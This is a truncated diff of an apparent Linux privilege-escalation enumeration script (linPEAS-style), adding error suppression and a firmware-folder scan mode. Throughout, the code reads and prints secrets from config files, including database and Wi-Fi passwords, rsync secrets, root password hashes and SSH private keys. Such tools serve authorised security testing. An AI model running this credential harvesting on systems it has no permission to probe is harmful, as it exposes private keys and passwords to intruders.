print_2title "Analyzing Moodle Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_MOODLE\" | grep -E \"config\.php$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "config.php"; fi; fi; printf "%s" "$PSTORAGE_MOODLE" | grep -E "config\.php$" | while read f; do ls -ld "$f" | sed -${E} "s,config\.php$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "dbtype|dbhost|dbuser|dbhost|dbpass|dbport" | sed -${E} "s,dbtype|dbhost|dbuser|dbhost|dbpass|dbport,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_MOODLE\" | grep -E \"config\.php$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "config.php"; fi; fi; printf "%s" "$PSTORAGE_MOODLE" | grep -E "config\.php$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,config\.php$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "dbtype|dbhost|dbuser|dbhost|dbpass|dbport" | sed -${E} "s,dbtype|dbhost|dbuser|dbhost|dbpass|dbport,${SED_RED},g"; done; echo ""; fi if [ "$PSTORAGE_SUPERVISORD" ] || [ "$DEBUG" ]; then print_2title "Analyzing Supervisord Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_SUPERVISORD\" | grep -E \"supervisord\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "supervisord.conf"; fi; fi; printf "%s" "$PSTORAGE_SUPERVISORD" | grep -E "supervisord\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,supervisord\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "port.*=|username.*=|password.*=" | sed -${E} "s,port.*=|username.*=|password.*=,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_SUPERVISORD\" | grep -E \"supervisord\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "supervisord.conf"; fi; fi; printf "%s" "$PSTORAGE_SUPERVISORD" | grep -E "supervisord\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,supervisord\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "port.*=|username.*=|password.*=" | sed -${E} "s,port.*=|username.*=|password.*=,${SED_RED},g"; done; echo ""; fi if [ "$PSTORAGE_CESI" ] || [ "$DEBUG" ]; then print_2title "Analyzing Cesi Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_CESI\" | grep -E \"cesi\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "cesi.conf"; fi; fi; printf "%s" "$PSTORAGE_CESI" | grep -E "cesi\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,cesi\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "username.*=|password.*=|host.*=|port.*=|database.*=" | sed -${E} "s,username.*=|password.*=|host.*=|port.*=|database.*=,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_CESI\" | grep -E \"cesi\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "cesi.conf"; fi; fi; printf "%s" "$PSTORAGE_CESI" | grep -E "cesi\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,cesi\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "username.*=|password.*=|host.*=|port.*=|database.*=" | sed -${E} "s,username.*=|password.*=|host.*=|port.*=|database.*=,${SED_RED},g"; done; echo ""; fi if [ "$PSTORAGE_RSYNC" ] || [ "$DEBUG" ]; then print_2title "Analyzing Rsync Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_RSYNC\" | grep -E \"rsyncd\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "rsyncd.conf"; fi; fi; printf "%s" "$PSTORAGE_RSYNC" | grep -E "rsyncd\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,rsyncd\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#" | sed -${E} "s,secrets.*|auth.*users.*=,${SED_RED},g"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_RSYNC\" | grep -E \"rsyncd\.secrets$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "rsyncd.secrets"; fi; fi; printf "%s" "$PSTORAGE_RSYNC" | grep -E "rsyncd\.secrets$" | while read f; do ls -ld "$f" | sed -${E} "s,rsyncd\.secrets$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_RSYNC\" | grep -E \"rsyncd\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "rsyncd.conf"; fi; fi; printf "%s" "$PSTORAGE_RSYNC" | grep -E "rsyncd\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,rsyncd\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#" | sed -${E} "s,secrets.*|auth.*users.*=,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_RSYNC\" | grep -E \"rsyncd\.secrets$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "rsyncd.secrets"; fi; fi; printf "%s" "$PSTORAGE_RSYNC" | grep -E "rsyncd\.secrets$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,rsyncd\.secrets$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; fi if [ "$PSTORAGE_HOSTAPD" ] || [ "$DEBUG" ]; then print_2title "Analyzing Hostapd Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_HOSTAPD\" | grep -E \"hostapd\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "hostapd.conf"; fi; fi; printf "%s" "$PSTORAGE_HOSTAPD" | grep -E "hostapd\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,hostapd\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,passphrase.*,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_HOSTAPD\" | grep -E \"hostapd\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "hostapd.conf"; fi; fi; printf "%s" "$PSTORAGE_HOSTAPD" | grep -E "hostapd\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,hostapd\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,passphrase.*,${SED_RED},g"; done; echo ""; fi if [ "$PSTORAGE_WIFI_CONNECTIONS" ] || [ "$DEBUG" ]; then print_2title "Analyzing Wifi Connections Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_WIFI_CONNECTIONS\" | grep -E \"system-connections$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "system-connections"; fi; fi; printf "%s" "$PSTORAGE_WIFI_CONNECTIONS" | grep -E "system-connections$" | while read f; do ls -ld "$f" | sed -${E} "s,system-connections$,${SED_RED},"; find "$f" -name "*" | while read ff; do ls -ld "$ff" | sed -${E} "s,.*,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E "psk.*" | sed -${E} "s,psk.*,${SED_RED},g"; done; echo "";done; echo ""; + if ! [ "`echo \"$PSTORAGE_WIFI_CONNECTIONS\" | grep -E \"system-connections$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "system-connections"; fi; fi; printf "%s" "$PSTORAGE_WIFI_CONNECTIONS" | grep -E "system-connections$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,system-connections$,${SED_RED},"; find "$f" -name "*" | while read ff; do ls -ld "$ff" | sed -${E} "s,.*,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E "psk.*" | sed -${E} "s,psk.*,${SED_RED},g"; done; echo "";done; echo ""; fi if [ "$PSTORAGE_ANACONDA_KS" ] || [ "$DEBUG" ]; then print_2title "Analyzing Anaconda ks Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_ANACONDA_KS\" | grep -E \"anaconda-ks\.cfg$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "anaconda-ks.cfg"; fi; fi; printf "%s" "$PSTORAGE_ANACONDA_KS" | grep -E "anaconda-ks\.cfg$" | while read f; do ls -ld "$f" | sed -${E} "s,anaconda-ks\.cfg$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "rootpw.*" | sed -${E} "s,rootpw.*,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_ANACONDA_KS\" | grep -E \"anaconda-ks\.cfg$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "anaconda-ks.cfg"; fi; fi; printf "%s" "$PSTORAGE_ANACONDA_KS" | grep -E "anaconda-ks\.cfg$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,anaconda-ks\.cfg$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "rootpw.*" | sed -${E} "s,rootpw.*,${SED_RED},g"; done; echo ""; fi if [ "$PSTORAGE_VNC" ] || [ "$DEBUG" ]; then print_2title "Analyzing VNC Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_VNC\" | grep -E \"\.vnc$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".vnc"; fi; fi; printf "%s" "$PSTORAGE_VNC" | grep -E "\.vnc$" | while read f; do ls -ld "$f" | sed -${E} "s,\.vnc$,${SED_RED},"; find "$f" -name "passwd" | while read ff; do ls -ld "$ff" | sed -${E} "s,passwd,${SED_RED},"; done; echo "";done; echo ""; - if ! [ "`echo \"$PSTORAGE_VNC\" | grep -E \"vnc.*\.c.*nf.*$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*vnc*.c*nf*"; fi; fi; printf "%s" "$PSTORAGE_VNC" | grep -E "vnc.*\.c.*nf.*$" | while read f; do ls -ld "$f" | sed -${E} "s,vnc.*\.c.*nf.*$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_VNC\" | grep -E \"vnc.*\.ini$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*vnc*.ini"; fi; fi; printf "%s" "$PSTORAGE_VNC" | grep -E "vnc.*\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,vnc.*\.ini$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_VNC\" | grep -E \"vnc.*\.txt$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*vnc*.txt"; fi; fi; printf "%s" "$PSTORAGE_VNC" | grep -E "vnc.*\.txt$" | while read f; do ls -ld "$f" | sed -${E} "s,vnc.*\.txt$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_VNC\" | grep -E \"vnc.*\.xml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*vnc*.xml"; fi; fi; printf "%s" "$PSTORAGE_VNC" | grep -E "vnc.*\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,vnc.*\.xml$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_VNC\" | grep -E \"\.vnc$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".vnc"; fi; fi; printf "%s" "$PSTORAGE_VNC" | grep -E "\.vnc$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.vnc$,${SED_RED},"; find "$f" -name "passwd" | while read ff; do ls -ld "$ff" | sed -${E} "s,passwd,${SED_RED},"; done; echo "";done; echo ""; + if ! [ "`echo \"$PSTORAGE_VNC\" | grep -E \"vnc.*\.c.*nf.*$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*vnc*.c*nf*"; fi; fi; printf "%s" "$PSTORAGE_VNC" | grep -E "vnc.*\.c.*nf.*$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,vnc.*\.c.*nf.*$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_VNC\" | grep -E \"vnc.*\.ini$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*vnc*.ini"; fi; fi; printf "%s" "$PSTORAGE_VNC" | grep -E "vnc.*\.ini$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,vnc.*\.ini$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_VNC\" | grep -E \"vnc.*\.txt$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*vnc*.txt"; fi; fi; printf "%s" "$PSTORAGE_VNC" | grep -E "vnc.*\.txt$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,vnc.*\.txt$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_VNC\" | grep -E \"vnc.*\.xml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*vnc*.xml"; fi; fi; printf "%s" "$PSTORAGE_VNC" | grep -E "vnc.*\.xml$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,vnc.*\.xml$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; fi if [ "$PSTORAGE_OPENVPN" ] || [ "$DEBUG" ]; then print_2title "Analyzing OpenVPN Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_OPENVPN\" | grep -E \"\.ovpn$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.ovpn"; fi; fi; printf "%s" "$PSTORAGE_OPENVPN" | grep -E "\.ovpn$" | while read f; do ls -ld "$f" | sed -${E} "s,\.ovpn$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "auth-user-pass.+" | sed -${E} "s,auth-user-pass.+,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_OPENVPN\" | grep -E \"\.ovpn$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.ovpn"; fi; fi; printf "%s" "$PSTORAGE_OPENVPN" | grep -E "\.ovpn$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.ovpn$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "auth-user-pass.+" | sed -${E} "s,auth-user-pass.+,${SED_RED},g"; done; echo ""; fi if [ "$PSTORAGE_LDAP" ] || [ "$DEBUG" ]; then print_2title "Analyzing Ldap Files (limit 70)" echo "The password hash is from the {SSHA} to 'structural'" - if ! [ "`echo \"$PSTORAGE_LDAP\" | grep -E \"ldap$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "ldap"; fi; fi; printf "%s" "$PSTORAGE_LDAP" | grep -E "ldap$" | while read f; do ls -ld "$f" | sed -${E} "s,ldap$,${SED_RED},"; find "$f" -name "*.bdb" | while read ff; do ls -ld "$ff" | sed -${E} "s,.bdb,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E -i -a -o "description.*" | sort | uniq | sed -${E} "s,administrator|password|ADMINISTRATOR|PASSWORD|Password|Administrator,${SED_RED},g"; done; echo "";done; echo ""; + if ! [ "`echo \"$PSTORAGE_LDAP\" | grep -E \"ldap$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "ldap"; fi; fi; printf "%s" "$PSTORAGE_LDAP" | grep -E "ldap$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,ldap$,${SED_RED},"; find "$f" -name "*.bdb" | while read ff; do ls -ld "$ff" | sed -${E} "s,.bdb,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E -i -a -o "description.*" | sort | uniq | sed -${E} "s,administrator|password|ADMINISTRATOR|PASSWORD|Password|Administrator,${SED_RED},g"; done; echo "";done; echo ""; fi @@ -2677,31 +3357,43 @@ fi #-- SI) ssh files print_2title "Searching ssl/ssh files" if [ "$PSTORAGE_CERTSB4" ]; then certsb4_grep=$(grep -L "\"\|'\|(" $PSTORAGE_CERTSB4 2>/dev/null); fi -sshconfig="$(ls /etc/ssh/ssh_config 2>/dev/null)" -hostsdenied="$(ls /etc/hosts.denied 2>/dev/null)" -hostsallow="$(ls /etc/hosts.allow 2>/dev/null)" -writable_agents=$(find $folder_path -type s -name "agent.*" -or -name "*gpg-agent*" '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')') +if ! [ "$SEARCH_IN_FOLDER" ]; then + sshconfig="$(ls /etc/ssh/ssh_config 2>/dev/null)" + hostsdenied="$(ls /etc/hosts.denied 2>/dev/null)" + hostsallow="$(ls /etc/hosts.allow 2>/dev/null)" + writable_agents=$(find /tmp /etc /home -type s -name "agent.*" -or -name "*gpg-agent*" '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null) +else + sshconfig="$(ls ${ROOT_FOLDER}etc/ssh/ssh_config 2>/dev/null)" + hostsdenied="$(ls ${ROOT_FOLDER}etc/hosts.denied 2>/dev/null)" + hostsallow="$(ls ${ROOT_FOLDER}etc/hosts.allow 2>/dev/null)" + writable_agents=$(find ${ROOT_FOLDER} -type s -name "agent.*" -or -name "*gpg-agent*" '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null) +fi if [ "$PSTORAGE_SSH" ] || [ "$DEBUG" ]; then print_2title "Analyzing SSH Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_SSH\" | grep -E \"id_dsa.*$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "id_dsa*"; fi; fi; printf "%s" "$PSTORAGE_SSH" | grep -E "id_dsa.*$" | while read f; do ls -ld "$f" | sed -${E} "s,id_dsa.*$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_SSH\" | grep -E \"id_rsa.*$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "id_rsa*"; fi; fi; printf "%s" "$PSTORAGE_SSH" | grep -E "id_rsa.*$" | while read f; do ls -ld "$f" | sed -${E} "s,id_rsa.*$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_SSH\" | grep -E \"known_hosts$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "known_hosts"; fi; fi; printf "%s" "$PSTORAGE_SSH" | grep -E "known_hosts$" | while read f; do ls -ld "$f" | sed -${E} "s,known_hosts$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_SSH\" | grep -E \"authorized_hosts$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "authorized_hosts"; fi; fi; printf "%s" "$PSTORAGE_SSH" | grep -E "authorized_hosts$" | while read f; do ls -ld "$f" | sed -${E} "s,authorized_hosts$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_SSH\" | grep -E \"authorized_keys$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "authorized_keys"; fi; fi; printf "%s" "$PSTORAGE_SSH" | grep -E "authorized_keys$" | while read f; do ls -ld "$f" | sed -${E} "s,authorized_keys$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,from=[\w\._\-]+,${SED_GOOD},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_SSH\" | grep -E \"id_dsa.*$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "id_dsa*"; fi; fi; printf "%s" "$PSTORAGE_SSH" | grep -E "id_dsa.*$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,id_dsa.*$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_SSH\" | grep -E \"id_rsa.*$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "id_rsa*"; fi; fi; printf "%s" "$PSTORAGE_SSH" | grep -E "id_rsa.*$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,id_rsa.*$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_SSH\" | grep -E \"known_hosts$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "known_hosts"; fi; fi; printf "%s" "$PSTORAGE_SSH" | grep -E "known_hosts$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,known_hosts$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_SSH\" | grep -E \"authorized_hosts$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "authorized_hosts"; fi; fi; printf "%s" "$PSTORAGE_SSH" | grep -E "authorized_hosts$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,authorized_hosts$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_SSH\" | grep -E \"authorized_keys$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "authorized_keys"; fi; fi; printf "%s" "$PSTORAGE_SSH" | grep -E "authorized_keys$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,authorized_keys$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,from=[\w\._\-]+,${SED_GOOD},g"; done; echo ""; fi grep "PermitRootLogin \|ChallengeResponseAuthentication \|PasswordAuthentication \|UsePAM \|Port\|PermitEmptyPasswords\|PubkeyAuthentication\|ListenAddress\|ForwardAgent\|AllowAgentForwarding\|AuthorizedKeysFiles" /etc/ssh/sshd_config 2>/dev/null | grep -v "#" | sed -${E} "s,PermitRootLogin.*es|PermitEmptyPasswords.*es|ChallengeResponseAuthentication.*es|FordwardAgent.*es,${SED_RED}," -if [ "$TIMEOUT" ]; then - privatekeyfilesetc=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /etc 2>/dev/null) - privatekeyfileshome=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' $HOMESEARCH 2>/dev/null) - privatekeyfilesroot=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /root 2>/dev/null) - privatekeyfilesmnt=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /mnt 2>/dev/null) +if ! [ "$SEARCH_IN_FOLDER" ]; then + if [ "$TIMEOUT" ]; then + privatekeyfilesetc=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /etc 2>/dev/null) + privatekeyfileshome=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' $HOMESEARCH 2>/dev/null) + privatekeyfilesroot=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /root 2>/dev/null) + privatekeyfilesmnt=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /mnt 2>/dev/null) + else + privatekeyfilesetc=$(grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /etc 2>/dev/null) #If there is tons of files linpeas gets frozen here without a timeout + privatekeyfileshome=$(grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' $HOME/.ssh 2>/dev/null) + fi else - privatekeyfilesetc=$(grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /etc 2>/dev/null) #If there is tons of files linpeas gets frozen here without a timeout - privatekeyfileshome=$(grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' $HOME/.ssh 2>/dev/null) + # If $SEARCH_IN_FOLDER lets just search for private keys in the whole firmware + privatekeyfilesetc=$(timeout 120 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' "$ROOT_FOLDER" 2>/dev/null) fi if [ "$privatekeyfilesetc" ] || [ "$privatekeyfileshome" ] || [ "$privatekeyfilesroot" ] || [ "$privatekeyfilesmnt" ] ; then @@ -2734,7 +3426,7 @@ if ssh-add -l 2>/dev/null | grep -qv 'no identities'; then ssh-add -l echo "" fi -if gpg-connect-agent "keyinfo --list" /bye | grep "D - - 1"; then +if gpg-connect-agent "keyinfo --list" /bye 2>/dev/null | grep "D - - 1"; then print_3title "Listing gpg keys cached in gpg-agent" gpg-connect-agent "keyinfo --list" /bye echo "" @@ -2751,39 +3443,39 @@ fi if [ "$hostsdenied" ]; then print_3title "/etc/hosts.denied file found, read the rules:" printf "$hostsdenied\n" - cat "/etc/hosts.denied" 2>/dev/null | grep -v "#" | grep -Iv "^$" | sed -${E} "s,.*,${SED_GREEN}," + cat " ${ROOT_FOLDER}etc/hosts.denied" 2>/dev/null | grep -v "#" | grep -Iv "^$" | sed -${E} "s,.*,${SED_GREEN}," echo "" fi if [ "$hostsallow" ]; then print_3title "/etc/hosts.allow file found, trying to read the rules:" printf "$hostsallow\n" - cat "/etc/hosts.allow" 2>/dev/null | grep -v "#" | grep -Iv "^$" | sed -${E} "s,.*,${SED_RED}," + cat " ${ROOT_FOLDER}etc/hosts.allow" 2>/dev/null | grep -v "#" | grep -Iv "^$" | sed -${E} "s,.*,${SED_RED}," echo "" fi if [ "$sshconfig" ]; then echo "" echo "Searching inside /etc/ssh/ssh_config for interesting info" - grep -v "^#" /etc/ssh/ssh_config 2>/dev/null | grep -Ev "\W+\#|^#" 2>/dev/null | grep -Iv "^$" | sed -${E} "s,Host|ForwardAgent|User|ProxyCommand,${SED_RED}," + grep -v "^#" ${ROOT_FOLDER}etc/ssh/ssh_config 2>/dev/null | grep -Ev "\W+\#|^#" 2>/dev/null | grep -Iv "^$" | sed -${E} "s,Host|ForwardAgent|User|ProxyCommand,${SED_RED}," fi echo "" if [ "$PSTORAGE_PAM_AUTH" ] || [ "$DEBUG" ]; then print_2title "Analyzing PAM Auth Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_PAM_AUTH\" | grep -E \"pam\.d$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "pam.d"; fi; fi; printf "%s" "$PSTORAGE_PAM_AUTH" | grep -E "pam\.d$" | while read f; do ls -ld "$f" | sed -${E} "s,pam\.d$,${SED_RED},"; find "$f" -name "sshd" | while read ff; do ls -ld "$ff" | sed -${E} "s,sshd,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E -i "auth" | grep -Ev "^#|^@" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";done; echo ""; + if ! [ "`echo \"$PSTORAGE_PAM_AUTH\" | grep -E \"pam\.d$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "pam.d"; fi; fi; printf "%s" "$PSTORAGE_PAM_AUTH" | grep -E "pam\.d$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,pam\.d$,${SED_RED},"; find "$f" -name "sshd" | while read ff; do ls -ld "$ff" | sed -${E} "s,sshd,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E -i "auth" | grep -Ev "^#|^@" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";done; echo ""; fi #-- SI) Passwords inside pam.d -pamdpass=$(grep -Ri "passwd" /etc/pam.d/ 2>/dev/null | grep -v ":#") +pamdpass=$(grep -Ri "passwd" ${ROOT_FOLDER}etc/pam.d/ 2>/dev/null | grep -v ":#") if [ "$pamdpass" ] || [ "$DEBUG" ]; then print_2title "Passwords inside pam.d" - grep -Ri "passwd" /etc/pam.d/ 2>/dev/null | grep -v ":#" | sed "s,passwd,${SED_RED}," + grep -Ri "passwd" ${ROOT_FOLDER}etc/pam.d/ 2>/dev/null | grep -v ":#" | sed "s,passwd,${SED_RED}," echo "" fi if [ "$PSTORAGE_NFS_EXPORTS" ] || [ "$DEBUG" ]; then print_2title "Analyzing NFS Exports Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_NFS_EXPORTS\" | grep -E \"exports$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "exports"; fi; fi; printf "%s" "$PSTORAGE_NFS_EXPORTS" | grep -E "exports$" | while read f; do ls -ld "$f" | sed -${E} "s,exports$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#" | sed -${E} "s,insecure,${SED_RED},g" | sed -${E} "s,no_root_squash|no_all_squash,${SED_RED_YELLOW},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_NFS_EXPORTS\" | grep -E \"exports$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "exports"; fi; fi; printf "%s" "$PSTORAGE_NFS_EXPORTS" | grep -E "exports$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} 